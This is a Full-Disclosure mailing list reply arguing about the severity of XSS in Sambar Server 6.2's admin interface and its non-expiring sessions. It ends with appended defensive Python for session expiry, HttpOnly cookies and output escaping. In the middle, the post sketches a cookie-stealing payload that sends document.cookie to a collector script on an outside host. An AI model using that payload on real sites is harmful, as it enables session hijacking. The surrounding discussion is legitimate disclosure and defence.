
Re: [Full-disclosure] XSS in Sambar Server version 6.2



"A user can input a specially crafted script that when rendered by the
application..."

Hopefully you can explain:

"Multiple XSS found in the administrative interface."

>> This kind of pre-supposes the idea that a user has access to the 
>> administrative interface.  The tests I ran were purely looking at what 
>> somebody with privileged rights could have affected within the application.  
>> For clarification, a user is by default somebody who is "identified" and 
>> then "authorised" to the system.  In the case of Sambar Server version 6.2 
>> this is done through the mandatory access control of username and password.  
>> The system in this case is the "administrative interface".

Granted, the XSS is a very low-level vulnerability.  However, combine the XSS 
with the ability to (document.cookie) and a 
document.location="http://domain.com/cookiecollector.pl"; which logs the user's 
cookie, then this becomes more of an issue.  Incidentally, did you know the 
application does not expire session states, i.e., if I log off or kill my 
session with the browser or otherwise and a miscreant (somebody who uses a Lynx 
browser), e.g., you, conspires to obtain my user identity - in this case we're 
using the example of the cookie - then this issue certainly becomes a 
high-level one.

From personal experience I know you've run across plenty of XSS issues before; 
we've both discussed where we've collided in previous job roles.  I guess, in 
a nutshell, it shows how little input/output validation is occurring throughout 
the application and what a user, if so inclined, can force the application into 
rendering.  But really, I used to point out input/output validation issues to 
you along with the other stuff you used to miss in your web application pen 
tests.
 
P.S. There'll be plenty of other issues (other than XSS) I'll publish re: 
Sambar Server 6.2.  I haven't got a problem if you would like to work with me 
in researching bugs/problems/issues.  It's just a matter of trying to work with 
the vendor to help understand the issues/apply a patch.  And btw, this 
isn't a personal attack against you either =)
 
J
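The two weaknesses J raises (script echoed back into the administrative interface, and sessions the server never expires after logoff) are both fixed on the server side. The following is an added example, not code from this thread or from Sambar Server; it assumes a cookie named `sid` and a 15-minute idle timeout, both chosen here for illustration.

```python
# Added example (not from the thread or from Sambar Server): server-side session
# store that forgets a token on logoff and on idle expiry, an HttpOnly cookie so
# document.cookie cannot read the token, and output encoding before echoing input.
import html
import secrets
import time
from typing import Optional

SESSION_TTL_SECONDS = 900  # assumed idle timeout (15 min), not a value from the page


class SessionStore:
    """Server-side session table; the cookie only carries an opaque token."""

    def __init__(self, now=time.time):
        self._now = now            # injectable clock, makes expiry testable
        self._sessions = {}        # token -> (user, last_seen)

    def login(self, user: str) -> str:
        token = secrets.token_urlsafe(32)   # unguessable, never derived from user
        self._sessions[token] = (user, self._now())
        return token

    def logoff(self, token: str) -> None:
        # Killing the browser window is not enough: the server must drop the token,
        # otherwise a stolen cookie keeps working after the user "logged off".
        self._sessions.pop(token, None)

    def user_for(self, token: str) -> Optional[str]:
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, last_seen = entry
        if self._now() - last_seen > SESSION_TTL_SECONDS:
            self._sessions.pop(token, None)    # idle expiry
            return None
        self._sessions[token] = (user, self._now())
        return user


def session_cookie_header(token: str) -> str:
    """Set-Cookie value; HttpOnly keeps the token out of document.cookie."""
    return f"sid={token}; Path=/; HttpOnly; Secure; SameSite=Strict"


def render_admin_page(user: str, search: str) -> str:
    """Escape user-controlled values before they are rendered into the admin page."""
    return f"<p>User: {html.escape(user)}</p><p>Search: {html.escape(search)}</p>"
```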


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/